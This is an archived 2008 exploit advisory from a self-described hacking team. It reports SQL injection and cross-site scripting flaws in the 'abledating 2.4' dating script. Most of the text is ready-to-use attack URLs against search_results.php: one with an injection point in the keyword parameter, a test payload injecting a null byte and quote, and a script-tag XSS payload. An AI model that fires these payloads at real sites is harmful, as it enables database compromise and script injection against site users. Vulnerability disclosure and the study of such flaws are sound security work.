abledating-sqlxss.txt

2008-05-22T00:00:00
ID PACKETSTORM:66619
Type packetstorm
Reporter Ali Jasbi
Modified 2008-05-22T00:00:00

Description

                                        
                                            `By : Ali Jasbi ( hackerz.ir security & hacking team)  
vendor : abk-soft.com  
product name : abledating 2.4  
Exploits :  
1- Sql injection :  
bug :  
http://abledating//search_results.php?p_age_from=18&p_age_to=18&keyword=[sql injection]&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search  
test :  
http://abledating/search_results.php?p_age_from=18&p_age_to=18&keyword=%00'&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search  
2-Cross site scripting :  
bug :  
http://abledating/search_results.php?p_orientation%5B%5D=2&p_age_from=18&p_age_to=18&p_relation%5B%5D=on&keyword=>'><ScRiPt%20%0a%0d>alert(42119.7535489005)%3B</ScRiPt>&status=online&save_search=on&search_name=My%20search&photo=on   
`